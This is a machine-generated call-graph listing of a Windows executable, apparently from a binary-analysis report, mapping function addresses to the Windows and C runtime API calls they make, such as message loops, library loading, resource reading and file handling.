87952 abed77 LockWindowUpdate DestroyWindow GetMessageW 87952->87945 87955 abeda9 87952->87955 87953 abebc7 87953->87945 88967 ab2ff6 16 API calls 87953->88967 87956 b259ef TranslateMessage DispatchMessageW GetMessageW 87955->87956 87956->87956 87958 b25a1f 87956->87958 87958->87945 87959 abed21 PeekMessageW 87959->88000 87960 ab1caa 49 API calls 87960->88000 87961 acf4ea 48 API calls 87961->88000 87962 abebf7 timeGetTime 87962->88000 87964 ab6eed 48 API calls 87964->88000 87965 b25557 WaitForSingleObject 87968 b25574 GetExitCodeProcess CloseHandle 87965->87968 87965->88000 87966 abed3a TranslateMessage DispatchMessageW 87966->87959 87967 b2588f Sleep 87996 b25429 Mailbox 87967->87996 87968->88000 87969 abd7f7 48 API calls 87969->87996 87970 abedae timeGetTime 88969 ab1caa 49 API calls 87970->88969 87972 b25733 Sleep 87972->87996 87975 acdc38 timeGetTime 87975->87996 87976 b25926 GetExitCodeProcess 87980 b25952 CloseHandle 87976->87980 87981 b2593c WaitForSingleObject 87976->87981 87978 ab2aae 308 API calls 87978->88000 87979 b25445 Sleep 87979->88000 87980->87996 87981->87980 87981->88000 87982 b25432 Sleep 87982->87979 87983 b18c4b 109 API calls 87983->87996 87984 ab2c79 108 API calls 87984->87996 87986 b259ae Sleep 87986->88000 87989 abce19 48 API calls 87989->87996 87992 abd6e9 55 API calls 87992->87996 87996->87969 87996->87975 87996->87976 87996->87979 87996->87982 87996->87983 87996->87984 87996->87986 87996->87989 87996->87992 87996->88000 88971 af4cbe 49 API calls Mailbox 87996->88971 88972 ab1caa 49 API calls 87996->88972 88973 ab2aae 332 API calls 87996->88973 89003 b0ccb2 50 API calls 87996->89003 89004 af7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87996->89004 89005 af6532 63 API calls 3 library calls 87996->89005 87998 abce19 48 API calls 87998->88000 87999 abd6e9 55 API calls 87999->88000 88000->87942 88000->87949 88000->87951 88000->87953 88000->87959 88000->87960 88000->87961 88000->87962 88000->87964 88000->87965 88000->87966 88000->87967 88000->87970 88000->87972 88000->87978 88000->87979 88000->87996 88000->87998 88000->87999 88840 abef00 88000->88840 88847 abf110 88000->88847 88912 ac45e0 88000->88912 88929 ace244 88000->88929 88934 acdc5f 88000->88934 88939 abeed0 332 API calls Mailbox 88000->88939 88940 ac3200 88000->88940 88970 b18d23 48 API calls 88000->88970 88974 abfe30 88000->88974 88001->87810 88002->87785 88003->87798 88005 abd7f7 48 API calls 88004->88005 88006 ab61db 88005->88006 88007 ab6009 88006->88007 88008 ab6016 __ftell_nolock 88007->88008 88009 ab6a63 48 API calls 88008->88009 88013 ab617c Mailbox 88008->88013 88011 ab6048 88009->88011 88019 ab607e Mailbox 88011->88019 88079 ab61a6 88011->88079 88012 ab614f 88012->88013 88014 abce19 48 API calls 88012->88014 88013->87830 88016 ab6170 88014->88016 88015 abce19 48 API calls 88015->88019 88018 ab64cf 48 API calls 88016->88018 88017 ab61a6 48 API calls 88017->88019 88018->88013 88019->88012 88019->88013 88019->88015 88019->88017 88020 ab64cf 48 API calls 88019->88020 88020->88019 88082 ab41a9 88021->88082 88024 ab3a06 88024->87836 88027 b22ff0 88029 ad1c9d _free 47 API calls 88027->88029 88030 b22ffd 88029->88030 88031 ab4252 84 API calls 88030->88031 88032 b23006 88031->88032 88032->88032 88034 acf4ea 48 API calls 88033->88034 88035 ab6237 88034->88035 88035->87841 88037 abd654 88036->88037 88044 abd67e 88036->88044 88038 abd65b 88037->88038 88041 abd6c2 88037->88041 88039 abd666 88038->88039 88045 abd6ab 88038->88045 88549 abd9a0 53 API calls __cinit 88039->88549 88041->88045 88551 acdce0 53 API calls 88041->88551 88044->87852 88045->88044 88550 acdce0 53 API calls 88045->88550 88047 ab641f 88046->88047 88048 ab6406 88046->88048 88050 ab6a63 48 API calls 88047->88050 88049 ab6eed 48 API calls 88048->88049 88051 ab62d1 88049->88051 88050->88051 88052 ad0fa7 88051->88052 88053 ad1028 88052->88053 88054 ad0fb3 88052->88054 88554 ad103a 59 API calls 4 library calls 88053->88554 88061 ad0fd8 88054->88061 88552 ad7c0e 47 API calls __getptd_noexit 88054->88552 88057 ad1035 88057->87858 88058 ad0fbf 88553 ad6e10 8 API calls ___strgtold12_l 88058->88553 88060 ad0fca 88060->87858 88061->87858 88063 ac1cf6 88062->88063 88065 ac1ba2 88062->88065 88063->87895 88064 ac1bae 88069 ac1bb9 88064->88069 88556 acc15c 48 API calls 88064->88556 88065->88064 88067 acf4ea 48 API calls 88065->88067 88068 b249c4 88067->88068 88071 acf4ea 48 API calls 88068->88071 88070 ac1c5d 88069->88070 88072 acf4ea 48 API calls 88069->88072 88070->87895 88077 b249cf 88071->88077 88073 ac1c9f 88072->88073 88074 ac1cb2 88073->88074 88555 ab2925 48 API calls 88073->88555 88074->87895 88076 acf4ea 48 API calls 88076->88077 88077->88064 88077->88076 88078->87895 88080 abbdfa 48 API calls 88079->88080 88081 ab61b1 88080->88081 88081->88011 88147 ab4214 88082->88147 88087 b24f73 88090 ab4252 84 API calls 88087->88090 88088 ab41d4 LoadLibraryExW 88157 ab4291 88088->88157 88092 b24f7a 88090->88092 88093 ab4291 3 API calls 88092->88093 88095 b24f82 88093->88095 88183 ab44ed 88095->88183 88096 ab41fb 88096->88095 88097 ab4207 88096->88097 88099 ab4252 84 API calls 88097->88099 88101 ab39fe 88099->88101 88101->88024 88106 afc396 88101->88106 88103 b24fa9 88191 ab4950 88103->88191 88105 b24fb6 88107 ab4517 83 API calls 88106->88107 88108 afc405 88107->88108 88369 afc56d 88108->88369 88111 ab44ed 64 API calls 88112 afc432 88111->88112 88113 ab44ed 64 API calls 88112->88113 88114 afc442 88113->88114 88115 ab44ed 64 API calls 88114->88115 88116 afc45d 88115->88116 88117 ab44ed 64 API calls 88116->88117 88118 afc478 88117->88118 88119 ab4517 83 API calls 88118->88119 88120 afc48f 88119->88120 88121 ad395c __crtGetStringTypeA_stat 47 API calls 88120->88121 88122 afc496 88121->88122 88123 ad395c __crtGetStringTypeA_stat 47 API calls 88122->88123 88124 afc4a0 88123->88124 88125 ab44ed 64 API calls 88124->88125 88126 afc4b4 88125->88126 88127 afbf5a GetSystemTimeAsFileTime 88126->88127 88128 afc4c7 88127->88128 88129 afc4dc 88128->88129 88130 afc4f1 88128->88130 88131 ad1c9d _free 47 API calls 88129->88131 88132 afc4f7 88130->88132 88133 afc556 88130->88133 88134 afc4e2 88131->88134 88375 afb965 88132->88375 88136 ad1c9d _free 47 API calls 88133->88136 88137 ad1c9d _free 47 API calls 88134->88137 88139 afc41b 88136->88139 88137->88139 88139->88027 88141 ab4252 88139->88141 88140 ad1c9d _free 47 API calls 88140->88139 88142 ab425c 88141->88142 88143 ab4263 88141->88143 88144 ad35e4 __fcloseall 83 API calls 88142->88144 88145 ab4283 FreeLibrary 88143->88145 88146 ab4272 88143->88146 88144->88143 88145->88146 88146->88027 88196 ab4339 88147->88196 88150 ab423c 88152 ab41bb 88150->88152 88153 ab4244 FreeLibrary 88150->88153 88154 ad3499 88152->88154 88153->88152 88204 ad34ae 88154->88204 88156 ab41c8 88156->88087 88156->88088 88283 ab42e4 88157->88283 88161 ab41ec 88164 ab4380 88161->88164 88162 ab42c1 FreeLibrary 88162->88161 88163 ab42b8 88163->88161 88163->88162 88165 acf4ea 48 API calls 88164->88165 88166 ab4395 88165->88166 88167 ab47b7 48 API calls 88166->88167 88168 ab43a1 _memcpy_s 88167->88168 88169 ab43dc 88168->88169 88170 ab4499 88168->88170 88171 ab44d1 88168->88171 88172 ab4950 57 API calls 88169->88172 88291 ab406b CreateStreamOnHGlobal 88170->88291 88302 afc750 93 API calls 88171->88302 88180 ab43e5 88172->88180 88175 ab44ed 64 API calls 88175->88180 88176 ab4479 88176->88096 88178 b24ed7 88179 ab4517 83 API calls 88178->88179 88181 b24eeb 88179->88181 88180->88175 88180->88176 88180->88178 88297 ab4517 88180->88297 88182 ab44ed 64 API calls 88181->88182 88182->88176 88184 ab44ff 88183->88184 88187 b24fc0 88183->88187 88326 ad381e 88184->88326 88188 afbf5a 88346 afbdb4 88188->88346 88190 afbf70 88190->88103 88192 b25002 88191->88192 88193 ab495f 88191->88193 88351 ad3e65 88193->88351 88195 ab4967 88195->88105 88200 ab434b 88196->88200 88199 ab4321 LoadLibraryA GetProcAddress 88199->88150 88201 ab422f 88200->88201 88202 ab4354 LoadLibraryA 88200->88202 88201->88150 88201->88199 88202->88201 88203 ab4365 GetProcAddress 88202->88203 88203->88201 88206 ad34ba _fseek 88204->88206 88205 ad34cd 88252 ad7c0e 47 API calls __getptd_noexit 88205->88252 88206->88205 88209 ad34fe 88206->88209 88208 ad34d2 88253 ad6e10 8 API calls ___strgtold12_l 88208->88253 88223 ade4c8 88209->88223 88212 ad3503 88213 ad350c 88212->88213 88214 ad3519 88212->88214 88254 ad7c0e 47 API calls __getptd_noexit 88213->88254 88216 ad3543 88214->88216 88217 ad3523 88214->88217 88237 ade5e0 88216->88237 88255 ad7c0e 47 API calls __getptd_noexit 88217->88255 88222 ad34dd _fseek @_EH4_CallFilterFunc@8 88222->88156 88224 ade4d4 _fseek 88223->88224 88225 ad7cf4 __lock 47 API calls 88224->88225 88226 ade4e2 88225->88226 88227 ade559 88226->88227 88233 ad7d7c __mtinitlocknum 47 API calls 88226->88233 88235 ade552 88226->88235 88260 ad4e5b 48 API calls __lock 88226->88260 88261 ad4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 88226->88261 88262 ad69d0 47 API calls __crtGetStringTypeA_stat 88227->88262 88230 ade560 88231 ade56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 88230->88231 88230->88235 88231->88235 88232 ade5cc _fseek 88232->88212 88233->88226 88257 ade5d7 88235->88257 88245 ade600 __wopenfile 88237->88245 88238 ade61a 88267 ad7c0e 47 API calls __getptd_noexit 88238->88267 88240 ade61f 88268 ad6e10 8 API calls ___strgtold12_l 88240->88268 88242 ade838 88264 ae63c9 88242->88264 88243 ad354e 88256 ad3570 LeaveCriticalSection LeaveCriticalSection _fseek 88243->88256 88245->88238 88251 ade7d5 88245->88251 88269 ad185b 59 API calls 3 library calls 88245->88269 88247 ade7ce 88247->88251 88270 ad185b 59 API calls 3 library calls 88247->88270 88249 ade7ed 88249->88251 88271 ad185b 59 API calls 3 library calls 88249->88271 88251->88238 88251->88242 88252->88208 88253->88222 88254->88222 88255->88222 88256->88222 88263 ad7e58 LeaveCriticalSection 88257->88263 88259 ade5de 88259->88232 88260->88226 88261->88226 88262->88230 88263->88259 88272 ae5bb1 88264->88272 88266 ae63e2 88266->88243 88267->88240 88268->88243 88269->88247 88270->88249 88271->88251 88273 ae5bbd _fseek 88272->88273 88274 ae5bcf 88273->88274 88277 ae5c06 88273->88277 88275 ad7c0e _free 47 API calls 88274->88275 88276 ae5bd4 88275->88276 88278 ad6e10 ___strgtold12_l 8 API calls 88276->88278 88279 ae5c78 __wsopen_helper 110 API calls 88277->88279 88280 ae5bde _fseek 88278->88280 88281 ae5c23 88279->88281 88280->88266 88282 ae5c4c __wsopen_helper LeaveCriticalSection 88281->88282 88282->88280 88287 ab42f6 88283->88287 88286 ab42cc LoadLibraryA GetProcAddress 88286->88163 88288 ab42aa 88287->88288 88289 ab42ff LoadLibraryA 88287->88289 88288->88163 88288->88286 88289->88288 88290 ab4310 GetProcAddress 88289->88290 88290->88288 88292 ab4085 FindResourceExW 88291->88292 88296 ab40a2 88291->88296 88293 b24f16 LoadResource 88292->88293 88292->88296 88294 b24f2b SizeofResource 88293->88294 88293->88296 88295 b24f3f LockResource 88294->88295 88294->88296 88295->88296 88296->88169 88298 ab4526 88297->88298 88301 b24fe0 88297->88301 88303 ad3a8d 88298->88303 88300 ab4534 88300->88180 88302->88169 88304 ad3a99 _fseek 88303->88304 88305 ad3aa7 88304->88305 88307 ad3acd 88304->88307 88316 ad7c0e 47 API calls __getptd_noexit 88305->88316 88318 ad4e1c 88307->88318 88308 ad3aac 88317 ad6e10 8 API calls ___strgtold12_l 88308->88317 88311 ad3ad3 88324 ad39fe 81 API calls 3 library calls 88311->88324 88313 ad3ae2 88325 ad3b04 LeaveCriticalSection LeaveCriticalSection _fseek 88313->88325 88315 ad3ab7 _fseek 88315->88300 88316->88308 88317->88315 88319 ad4e2c 88318->88319 88320 ad4e4e EnterCriticalSection 88318->88320 88319->88320 88322 ad4e34 88319->88322 88321 ad4e44 88320->88321 88321->88311 88323 ad7cf4 __lock 47 API calls 88322->88323 88323->88321 88324->88313 88325->88315 88329 ad3839 88326->88329 88328 ab4510 88328->88188 88330 ad3845 _fseek 88329->88330 88331 ad3888 88330->88331 88333 ad385b _memset 88330->88333 88341 ad3880 _fseek 88330->88341 88332 ad4e1c __lock_file 48 API calls 88331->88332 88334 ad388e 88332->88334 88342 ad7c0e 47 API calls __getptd_noexit 88333->88342 88344 ad365b 62 API calls 6 library calls 88334->88344 88337 ad3875 88343 ad6e10 8 API calls ___strgtold12_l 88337->88343 88338 ad38a4 88345 ad38c2 LeaveCriticalSection LeaveCriticalSection _fseek 88338->88345 88341->88328 88342->88337 88343->88341 88344->88338 88345->88341 88349 ad344a GetSystemTimeAsFileTime 88346->88349 88348 afbdc3 88348->88190 88350 ad3478 __aulldiv 88349->88350 88350->88348 88352 ad3e71 _fseek 88351->88352 88353 ad3e7f 88352->88353 88354 ad3e94 88352->88354 88365 ad7c0e 47 API calls __getptd_noexit 88353->88365 88356 ad4e1c __lock_file 48 API calls 88354->88356 88358 ad3e9a 88356->88358 88357 ad3e84 88366 ad6e10 8 API calls ___strgtold12_l 88357->88366 88367 ad3b0c 55 API calls 5 library calls 88358->88367 88361 ad3ea5 88368 ad3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 88361->88368 88362 ad3e8f _fseek 88362->88195 88364 ad3eb7 88364->88362 88365->88357 88366->88362 88367->88361 88368->88364 88374 afc581 __tzset_nolock _wcscmp 88369->88374 88370 ab44ed 64 API calls 88370->88374 88371 afc417 88371->88111 88371->88139 88372 afbf5a GetSystemTimeAsFileTime 88372->88374 88373 ab4517 83 API calls 88373->88374 88374->88370 88374->88371 88374->88372 88374->88373 88376 afb97e 88375->88376 88377 afb970 88375->88377 88379 afb9c3 88376->88379 88380 ad3499 117 API calls 88376->88380 88405 afb987 88376->88405 88378 ad3499 117 API calls 88377->88378 88378->88376 88406 afbbe8 64 API calls 3 library calls 88379->88406 88381 afb9a8 88380->88381 88381->88379 88383 afb9b1 88381->88383 88383->88405 88417 ad35e4 88383->88417 88384 afba07 88385 afba2c 88384->88385 88386 afba0b 88384->88386 88407 afb7e5 47 API calls __crtGetStringTypeA_stat 88385->88407 88389 afba18 88386->88389 88390 ad35e4 __fcloseall 83 API calls 88386->88390 88392 ad35e4 __fcloseall 83 API calls 88389->88392 88389->88405 88390->88389 88391 afba34 88393 afba5a 88391->88393 88394 afba3a 88391->88394 88392->88405 88408 afba8a 90 API calls 88393->88408 88396 afba47 88394->88396 88398 ad35e4 __fcloseall 83 API calls 88394->88398 88399 ad35e4 __fcloseall 83 API calls 88396->88399 88396->88405 88397 afba61 88409 afbb64 88397->88409 88398->88396 88399->88405 88402 afba75 88404 ad35e4 __fcloseall 83 API calls 88402->88404 88402->88405 88403 ad35e4 __fcloseall 83 API calls 88403->88402 88404->88405 88405->88140 88406->88384 88407->88391 88408->88397 88410 afbb71 88409->88410 88413 afbb77 88409->88413 88411 ad1c9d _free 47 API calls 88410->88411 88411->88413 88412 afbb88 88415 afba68 88412->88415 88416 ad1c9d _free 47 API calls 88412->88416 88413->88412 88414 ad1c9d _free 47 API calls 88413->88414 88414->88412 88415->88402 88415->88403 88416->88415 88418 ad35f0 _fseek 88417->88418 88419 ad361c 88418->88419 88420 ad3604 88418->88420 88422 ad4e1c __lock_file 48 API calls 88419->88422 88426 ad3614 _fseek 88419->88426 88446 ad7c0e 47 API calls __getptd_noexit 88420->88446 88424 ad362e 88422->88424 88423 ad3609 88447 ad6e10 8 API calls ___strgtold12_l 88423->88447 88430 ad3578 88424->88430 88426->88405 88431 ad359b 88430->88431 88432 ad3587 88430->88432 88438 ad3597 88431->88438 88449 ad2c84 88431->88449 88489 ad7c0e 47 API calls __getptd_noexit 88432->88489 88434 ad358c 88490 ad6e10 8 API calls ___strgtold12_l 88434->88490 88448 ad3653 LeaveCriticalSection LeaveCriticalSection _fseek 88438->88448 88442 ad35b5 88466 ade9d2 88442->88466 88444 ad35bb 88444->88438 88445 ad1c9d _free 47 API calls 88444->88445 88445->88438 88446->88423 88447->88426 88448->88426 88450 ad2c97 88449->88450 88451 ad2cbb 88449->88451 88450->88451 88452 ad2933 __flush 47 API calls 88450->88452 88455 adeb36 88451->88455 88453 ad2cb4 88452->88453 88491 adaf61 88453->88491 88456 ad35af 88455->88456 88457 adeb43 88455->88457 88459 ad2933 88456->88459 88457->88456 88458 ad1c9d _free 47 API calls 88457->88458 88458->88456 88460 ad293d 88459->88460 88461 ad2952 88459->88461 88516 ad7c0e 47 API calls __getptd_noexit 88460->88516 88461->88442 88463 ad2942 88517 ad6e10 8 API calls ___strgtold12_l 88463->88517 88465 ad294d 88465->88442 88467 ade9de _fseek 88466->88467 88468 ade9fe 88467->88468 88469 ade9e6 88467->88469 88471 adea7b 88468->88471 88476 adea28 88468->88476 88542 ad7bda 47 API calls __getptd_noexit 88469->88542 88546 ad7bda 47 API calls __getptd_noexit 88471->88546 88472 ade9eb 88543 ad7c0e 47 API calls __getptd_noexit 88472->88543 88475 adea80 88547 ad7c0e 47 API calls __getptd_noexit 88475->88547 88518 ada8ed 88476->88518 88479 adea2e 88482 adea4c 88479->88482 88483 adea41 88479->88483 88480 adea88 88548 ad6e10 8 API calls ___strgtold12_l 88480->88548 88544 ad7c0e 47 API calls __getptd_noexit 88482->88544 88527 adea9c 88483->88527 88486 adea47 88545 adea73 LeaveCriticalSection __unlock_fhandle 88486->88545 88487 ade9f3 _fseek 88487->88444 88489->88434 88490->88438 88492 adaf6d _fseek 88491->88492 88493 adaf75 88492->88493 88494 adaf8d 88492->88494 88496 ad7bda __free_osfhnd 47 API calls 88493->88496 88495 adb022 88494->88495 88499 adafbf 88494->88499 88497 ad7bda __free_osfhnd 47 API calls 88495->88497 88498 adaf7a 88496->88498 88500 adb027 88497->88500 88501 ad7c0e _free 47 API calls 88498->88501 88502 ada8ed ___lock_fhandle 49 API calls 88499->88502 88503 ad7c0e _free 47 API calls 88500->88503 88510 adaf82 _fseek 88501->88510 88504 adafc5 88502->88504 88505 adb02f 88503->88505 88506 adafd8 88504->88506 88507 adafeb 88504->88507 88508 ad6e10 ___strgtold12_l 8 API calls 88505->88508 88509 adb043 __chsize_nolock 75 API calls 88506->88509 88511 ad7c0e _free 47 API calls 88507->88511 88508->88510 88512 adafe4 88509->88512 88510->88451 88513 adaff0 88511->88513 88515 adb01a __flush LeaveCriticalSection 88512->88515 88514 ad7bda __free_osfhnd 47 API calls 88513->88514 88514->88512 88515->88510 88516->88463 88517->88465 88519 ada8f9 _fseek 88518->88519 88520 ada946 EnterCriticalSection 88519->88520 88521 ad7cf4 __lock 47 API calls 88519->88521 88522 ada96c _fseek 88520->88522 88523 ada91d 88521->88523 88522->88479 88524 ada928 InitializeCriticalSectionAndSpinCount 88523->88524 88525 ada93a 88523->88525 88524->88525 88526 ada970 ___lock_fhandle LeaveCriticalSection 88525->88526 88526->88520 88528 adaba4 __lseeki64_nolock 47 API calls 88527->88528 88531 adeaaa 88528->88531 88529 adeb00 88530 adab1e __free_osfhnd 48 API calls 88529->88530 88535 adeb08 88530->88535 88531->88529 88532 adeade 88531->88532 88533 adaba4 __lseeki64_nolock 47 API calls 88531->88533 88532->88529 88534 adaba4 __lseeki64_nolock 47 API calls 88532->88534 88536 adead5 88533->88536 88537 adeaea CloseHandle 88534->88537 88538 adeb2a 88535->88538 88541 ad7bed __dosmaperr 47 API calls 88535->88541 88539 adaba4 __lseeki64_nolock 47 API calls 88536->88539 88537->88529 88540 adeaf6 GetLastError 88537->88540 88538->88486 88539->88532 88540->88529 88541->88538 88542->88472 88543->88487 88544->88486 88545->88487 88546->88475 88547->88480 88548->88487 88549->88044 88550->88044 88551->88045 88552->88058 88553->88060 88554->88057 88555->88074 88556->88069 88558 adf8a0 __ftell_nolock 88557->88558 88559 ab40b4 GetLongPathNameW 88558->88559 88560 ab6a63 48 API calls 88559->88560 88561 ab40dc 88560->88561 88562 ab49a0 88561->88562 88563 abd7f7 48 API calls 88562->88563 88564 ab49b2 88563->88564 88565 ab660f 49 API calls 88564->88565 88566 ab49bd 88565->88566 88567 ab49c8 88566->88567 88573 b22e35 88566->88573 88568 ab64cf 48 API calls 88567->88568 88570 ab49d4 88568->88570 88609 ab28a6 88570->88609 88572 b22e4f 88573->88572 88615 acd35e 60 API calls 88573->88615 88574 ab49e7 Mailbox 88574->87913 88576 ab41a9 136 API calls 88575->88576 88577 ab415e 88576->88577 88578 b23489 88577->88578 88580 ab41a9 136 API calls 88577->88580 88579 afc396 122 API calls 88578->88579 88581 b2349e 88579->88581 88582 ab4172 88580->88582 88583 b234a2 88581->88583 88584 b234bf 88581->88584 88582->88578 88585 ab417a 88582->88585 88586 ab4252 84 API calls 88583->88586 88587 acf4ea 48 API calls 88584->88587 88588 b234aa 88585->88588 88589 ab4186 88585->88589 88586->88588 88608 b23504 Mailbox 88587->88608 88704 af6b49 88 API calls _wprintf 88588->88704 88616 abc833 88589->88616 88593 b234b8 88593->88584 88594 b236b4 88595 ad1c9d _free 47 API calls 88594->88595 88596 b236bc 88595->88596 88597 ab4252 84 API calls 88596->88597 88602 b236c5 88597->88602 88601 ad1c9d _free 47 API calls 88601->88602 88602->88601 88603 ab4252 84 API calls 88602->88603 88710 af25b5 87 API calls 4 library calls 88602->88710 88603->88602 88605 abce19 48 API calls 88605->88608 88608->88594 88608->88602 88608->88605 88705 af2551 48 API calls _memcpy_s 88608->88705 88706 af2472 60 API calls 2 library calls 88608->88706 88707 af9c12 48 API calls 88608->88707 88708 abba85 48 API calls _memcpy_s 88608->88708 88709 ab4dd9 48 API calls 88608->88709 88610 ab28b8 88609->88610 88614 ab28d7 _memcpy_s 88609->88614 88612 acf4ea 48 API calls 88610->88612 88611 acf4ea 48 API calls 88613 ab28ee 88611->88613 88612->88614 88613->88574 88614->88611 88615->88573 88617 abc843 __ftell_nolock 88616->88617 88618 b23095 88617->88618 88619 abc860 88617->88619 88735 af25b5 87 API calls 4 library calls 88618->88735 88716 ab48ba 49 API calls 88619->88716 88622 b230a8 88736 af25b5 87 API calls 4 library calls 88622->88736 88623 abc882 88717 ab4550 56 API calls 88623->88717 88625 abc897 88625->88622 88626 abc89f 88625->88626 88628 abd7f7 48 API calls 88626->88628 88630 abc8ab 88628->88630 88629 b230c4 88631 abc90c 88629->88631 88718 ace968 49 API calls __ftell_nolock 88630->88718 88633 abc91a 88631->88633 88634 b230d7 88631->88634 88721 ad1dfc 88633->88721 88636 ab4907 CloseHandle 88634->88636 88635 abc8b7 88637 abd7f7 48 API calls 88635->88637 88639 b230e3 88636->88639 88640 abc8c3 88637->88640 88641 ab41a9 136 API calls 88639->88641 88642 ab660f 49 API calls 88640->88642 88643 b2310d 88641->88643 88644 abc8d1 88642->88644 88646 b23136 88643->88646 88649 afc396 122 API calls 88643->88649 88719 aceb66 SetFilePointerEx ReadFile 88644->88719 88645 abc943 _wcscat _wcscpy 88648 abc96d SetCurrentDirectoryW 88645->88648 88737 af25b5 87 API calls 4 library calls 88646->88737 88652 acf4ea 48 API calls 88648->88652 88653 b23129 88649->88653 88650 abc8fd 88720 ab46ce SetFilePointerEx SetFilePointerEx 88650->88720 88656 abc988 88652->88656 88657 b23152 88653->88657 88658 b23131 88653->88658 88655 b2314d 88687 abcad1 Mailbox 88655->88687 88659 ab47b7 48 API calls 88656->88659 88661 ab4252 84 API calls 88657->88661 88660 ab4252 84 API calls 88658->88660 88691 abc993 Mailbox __wsetenvp 88659->88691 88660->88646 88662 b23157 88661->88662 88663 acf4ea 48 API calls 88662->88663 88670 b23194 88663->88670 88664 abca9d 88731 ab4907 88664->88731 88668 ab3d98 88668->87787 88668->87810 88669 abcaa9 SetCurrentDirectoryW 88669->88687 88738 abba85 48 API calls _memcpy_s 88670->88738 88674 b233ce 88744 af9b72 48 API calls 88674->88744 88675 b23467 88748 af25b5 87 API calls 4 library calls 88675->88748 88678 b23480 88678->88664 88680 b233f0 88745 b129e8 48 API calls _memcpy_s 88680->88745 88682 b233fd 88683 ad1c9d _free 47 API calls 88682->88683 88683->88687 88685 b2345f 88747 af240b 48 API calls 3 library calls 88685->88747 88711 ab48dd 88687->88711 88688 abce19 48 API calls 88688->88691 88691->88664 88691->88675 88691->88685 88691->88688 88724 abb337 56 API calls _wcscpy 88691->88724 88725 acc258 GetStringTypeW 88691->88725 88726 abcb93 59 API calls __wcsnicmp 88691->88726 88727 abcb5a GetStringTypeW __wsetenvp 88691->88727 88728 ad16d0 GetStringTypeW __towlower_l 88691->88728 88729 abcc24 163 API calls 3 library calls 88691->88729 88730 acc682 48 API calls 88691->88730 88695 abce19 48 API calls 88701 b231dd Mailbox 88695->88701 88698 b23420 88746 af25b5 87 API calls 4 library calls 88698->88746 88700 b23439 88702 ad1c9d _free 47 API calls 88700->88702 88701->88674 88701->88695 88701->88698 88739 af2551 48 API calls _memcpy_s 88701->88739 88740 af2472 60 API calls 2 library calls 88701->88740 88741 af9c12 48 API calls 88701->88741 88742 abba85 48 API calls _memcpy_s 88701->88742 88743 acc682 48 API calls 88701->88743 88703 b2344c 88702->88703 88703->88687 88704->88593 88705->88608 88706->88608 88707->88608 88708->88608 88709->88608 88710->88602 88712 ab4907 CloseHandle 88711->88712 88713 ab48e5 Mailbox 88712->88713 88714 ab4907 CloseHandle 88713->88714 88715 ab48fc 88714->88715 88715->88668 88716->88623 88717->88625 88718->88635 88719->88650 88720->88631 88749 ad1e46 88721->88749 88724->88691 88725->88691 88726->88691 88727->88691 88728->88691 88729->88691 88730->88691 88732 ab4911 88731->88732 88733 ab4920 88731->88733 88732->88669 88733->88732 88734 ab4925 CloseHandle 88733->88734 88734->88732 88735->88622 88736->88629 88737->88655 88738->88701 88739->88701 88740->88701 88741->88701 88742->88701 88743->88701 88744->88680 88745->88682 88746->88700 88747->88675 88748->88678 88750 ad1e61 88749->88750 88753 ad1e55 88749->88753 88773 ad7c0e 47 API calls __getptd_noexit 88750->88773 88752 ad2019 88757 ad1e41 88752->88757 88774 ad6e10 8 API calls ___strgtold12_l 88752->88774 88753->88750 88761 ad1ed4 88753->88761 88768 ad9d6b 47 API calls 2 library calls 88753->88768 88756 ad1fa0 88756->88750 88756->88757 88759 ad1fb0 88756->88759 88757->88645 88758 ad1f5f 88758->88750 88760 ad1f7b 88758->88760 88770 ad9d6b 47 API calls 2 library calls 88758->88770 88772 ad9d6b 47 API calls 2 library calls 88759->88772 88760->88750 88760->88757 88763 ad1f91 88760->88763 88761->88750 88767 ad1f41 88761->88767 88769 ad9d6b 47 API calls 2 library calls 88761->88769 88771 ad9d6b 47 API calls 2 library calls 88763->88771 88767->88756 88767->88758 88768->88761 88769->88767 88770->88760 88771->88757 88772->88757 88773->88752 88774->88757 88776 ab4c8b 88775->88776 88777 ab4d94 88775->88777 88776->88777 88778 acf4ea 48 API calls 88776->88778 88777->87919 88779 ab4cb2 88778->88779 88780 acf4ea 48 API calls 88779->88780 88781 ab4d22 88780->88781 88781->88777 88788 abb470 88781->88788 88816 ab4dd9 48 API calls 88781->88816 88817 af9af1 48 API calls 88781->88817 88818 abba85 48 API calls _memcpy_s 88781->88818 88786->87922 88787->87924 88789 ab6b0f 48 API calls 88788->88789 88809 abb495 88789->88809 88790 abb69b 88821 abba85 48 API calls _memcpy_s 88790->88821 88792 abb6b5 Mailbox 88792->88781 88795 b2397b 88832 af26bc 89 API calls 4 library calls 88795->88832 88796 abba85 48 API calls 88796->88809 88798 abb9e4 88834 af26bc 89 API calls 4 library calls 88798->88834 88800 b23973 88800->88792 88803 b23989 88833 abba85 48 API calls _memcpy_s 88803->88833 88804 abbcce 48 API calls 88804->88809 88806 b23909 88807 ab6b4a 48 API calls 88806->88807 88810 b23914 88807->88810 88808 abbb85 48 API calls 88808->88809 88809->88790 88809->88795 88809->88796 88809->88798 88809->88804 88809->88806 88809->88808 88812 abbdfa 48 API calls 88809->88812 88815 b23939 _memcpy_s 88809->88815 88819 abc413 59 API calls 88809->88819 88820 abbc74 48 API calls 88809->88820 88822 abc6a5 49 API calls 88809->88822 88823 abc799 88809->88823 88814 acf4ea 48 API calls 88810->88814 88813 abb66c CharUpperBuffW 88812->88813 88813->88809 88814->88815 88831 af26bc 89 API calls 4 library calls 88815->88831 88816->88781 88817->88781 88818->88781 88819->88809 88820->88809 88821->88792 88822->88809 88824 b21f17 88823->88824 88827 abc7b0 88823->88827 88825 ab6b4a 48 API calls 88824->88825 88826 b21f21 88825->88826 88829 acf4ea 48 API calls 88826->88829 88828 acee75 48 API calls 88827->88828 88830 abc7bd _memcpy_s 88827->88830 88828->88830 88829->88830 88830->88809 88831->88800 88832->88803 88833->88800 88834->88800 88836 ab403c LoadImageW 88835->88836 88837 b2418d EnumResourceNamesW 88835->88837 88838 ab3ee1 RegisterClassExW 88836->88838 88837->88838 88839 ab3f53 7 API calls 88838->88839 88839->87938 88841 abef2f 88840->88841 88842 abef1d 88840->88842 89007 afcc5c 87 API calls 4 library calls 88841->89007 89006 abe3b0 332 API calls 2 library calls 88842->89006 88844 abef26 88844->88000 88846 b286f9 88846->88846 88848 abf130 88847->88848 88850 abfe30 332 API calls 88848->88850 88853 abf199 88848->88853 88849 abf595 88858 abd7f7 48 API calls 88849->88858 88902 abf431 